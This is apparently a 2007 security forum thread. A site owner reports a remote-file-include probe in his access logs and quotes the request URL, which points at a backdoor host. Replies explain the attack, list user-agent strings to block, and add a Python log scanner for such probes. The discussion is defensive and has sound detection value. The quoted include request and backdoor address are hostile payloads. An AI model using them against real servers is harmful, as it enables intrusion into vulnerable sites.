SQL injection attack - What was he attempting?

Discussion in 'Security' started by sweetfunny, Mar 21, 2007.

  1. #1
    Hello,

    Last night I caught someone attempting some sort of SQL injection on my cPanel account, showing in the latest visitors.

    The log shows:

    index.php?page=http://www.yenzero.com/c.in??
    Http Code: 406 Date: Mar 22 08:46:21 Http Version: HTTP/1.1 Size in Bytes: 268
    Referer: -
    Agent: libwww-perl/5.805

    Just a warning: if you go to the URL appended to the end of the string, my firewall throws up a php_chaploit.r warning and there's a bunch of junk code on the page.

    Anyhow, this attempt was happening at the rate of about a request every 10 seconds, sometimes only 1 second apart. It was coming from a range of IPs from all around the place, like hundreds of different addresses.

    So I couldn't ban the IPs, but I did ban the IP that the yenzero URL is on, and also removed my index.php page. The requests kept happening, so I just changed my nameservers to the Domainsite parking page (don't like them anyway).

    Can anyone give me any further info on this, and would using mod_rewrite to remove the /index.php?page= from my URLs offer any help?

    Can anyone give some more input on this?

    Thanks, sweetfunny.
     
    sweetfunny, Mar 21, 2007 IP
  2. rootbinbash

    #2
    mod_rewrite is useless for this. You should fix your code.
     
    rootbinbash, Mar 22, 2007 IP
  3. sweetfunny

    #3
    Thanks for your reply.

    It didn't appear he got in, as he was only requesting the index.php page over and over again. Or did he actually exploit my code and was using my server for something?

    I don't know that my code is even vulnerable; the script did have a vulnerability listed on the advisories, but I applied the fix for it.

    I have no idea, maybe I just point my nameservers back and monitor the logs again.
     
    sweetfunny, Mar 22, 2007 IP
  4. Estevan

    #4
    It's a little kid using a premade tool to look for vulnerable servers. Only ban the IP, or better, ban the IP range :)!
     
    Estevan, Mar 24, 2007 IP
  5. ajsa52

    #5
    Well, you can ban the "User-Agent" in your .htaccess file.

    I'm currently banning these User-Agent substrings (among others):
    "Wget"
    "HTTrack"
    "WebCopier"
    "WebSauger"
    "WebReaper"
    "WebStripper"
    "Web Downloader"
    "libwww-perl"
    "Python-urllib"
     
    ajsa52, Mar 24, 2007 IP
    sweetfunny likes this.
  6. sweetfunny

    #6
    If I did that I would have to ban *.*.*.*, because every request was coming from a completely different IP and IP range.

    BIG green rep to you, thank you.

    I knew doing something like this was possible for Wget and site rippers, but didn't think it could be done with the "libwww-perl" that was hitting me.

    You're a lifesaver. :)
     
    sweetfunny, Mar 25, 2007 IP
  7. rootbinbash

    #7
    He was trying to include a remote file. This is your starting point.
     
    rootbinbash, Mar 26, 2007 IP
  8. Louis11

    #8
    As rootbinbash stated, he was trying to perform a remote file include. Google "Remote File Includes" and you should get a ton of information about it.

    The file he was trying to access is a backdoor of some sort. When he includes it in your URL he is trying to get your code to execute his code (on your server). This will execute the commands in his file and usually create a new username for him, or allow him access to the server.

    Oh, and check to make sure that there are no new files on your server, specifically in your tmp. I looked at the code and it seems it does a lot of wgets to the tmp directory... so if lots of things start showing up there you might have a problem :)

    He's a script kiddie... I wouldn't worry too much, just ban the IP and secure the remote include (if you're vulnerable).
     
    Louis11, Mar 26, 2007 IP
    sweetfunny likes this.
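    To turn the log entry in post #1, the User-Agent substrings in post #5 and the remote-file-include explanation in posts #7 and #8 into detection logic, here is an added example that is not code from anyone in this thread: a small Python scanner that parses Apache combined-format access-log lines and flags requests whose query parameter is itself a URL (the RFI probe) or whose User-Agent matches the banned substrings. The log lines are constructed for the example; the first mirrors sweetfunny's entry with RFC 5737 documentation IPs in place of real addresses.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed Apache combined-format log lines (not from the thread). The first
# mirrors the request sweetfunny posted; IPs are RFC 5737 documentation addresses.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Mar/2007:08:46:21 +0000] "GET /index.php?page=http://www.yenzero.com/c.in?? HTTP/1.1" 406 268 "-" "libwww-perl/5.805"
198.51.100.7 - - [22/Mar/2007:08:46:31 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.9 - - [22/Mar/2007:08:46:40 +0000] "GET /index.php?page=ftp://203.0.113.77/x.txt HTTP/1.1" 200 300 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# User-Agent substrings to flag, a subset of ajsa52's list above.
BAD_UA_SUBSTRINGS = ("libwww-perl", "Python-urllib", "Wget", "HTTrack")

# A query value that is itself a URL is the signature of an RFI probe against include($_GET['page'])-style code.
REMOTE_URL_RE = re.compile(r"^(https?|ftps?)://", re.IGNORECASE)


def classify(line):
    """Return ip, status and the reasons a request looks hostile; None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    query = parse_qs(urlparse(m.group("path")).query, keep_blank_values=True)
    for param, values in query.items():
        if any(REMOTE_URL_RE.match(v) for v in values):
            reasons.append(f"remote URL in parameter '{param}'")
    ua = m.group("ua")
    if any(s.lower() in ua.lower() for s in BAD_UA_SUBSTRINGS):
        reasons.append(f"blocked user-agent '{ua}'")
    return {"ip": m.group("ip"), "status": int(m.group("status")), "reasons": reasons}


def scan(log_text):
    """Return the classified records for every line that raised at least one reason."""
    hits = []
    for line in log_text.splitlines():
        rec = classify(line)
        if rec and rec["reasons"]:
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["ip"], rec["status"], "; ".join(rec["reasons"]))
```

    Note that the 406 in sweetfunny's log means the request was already refused by the server; the remote-URL check is what tells you the probe was an include attempt rather than ordinary scraping, regardless of which User-Agent string the tool claims.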
  9. Zinho

    #9
    This could be the start of an attack, or a way to make some "noise" in your logs to cover previous actions. I advise you to check your script instead of concentrating on banning the attacker, which is quite a useless practice since he can use a proxy rotator or a user-agent faker.
     
    Zinho, Apr 9, 2007 IP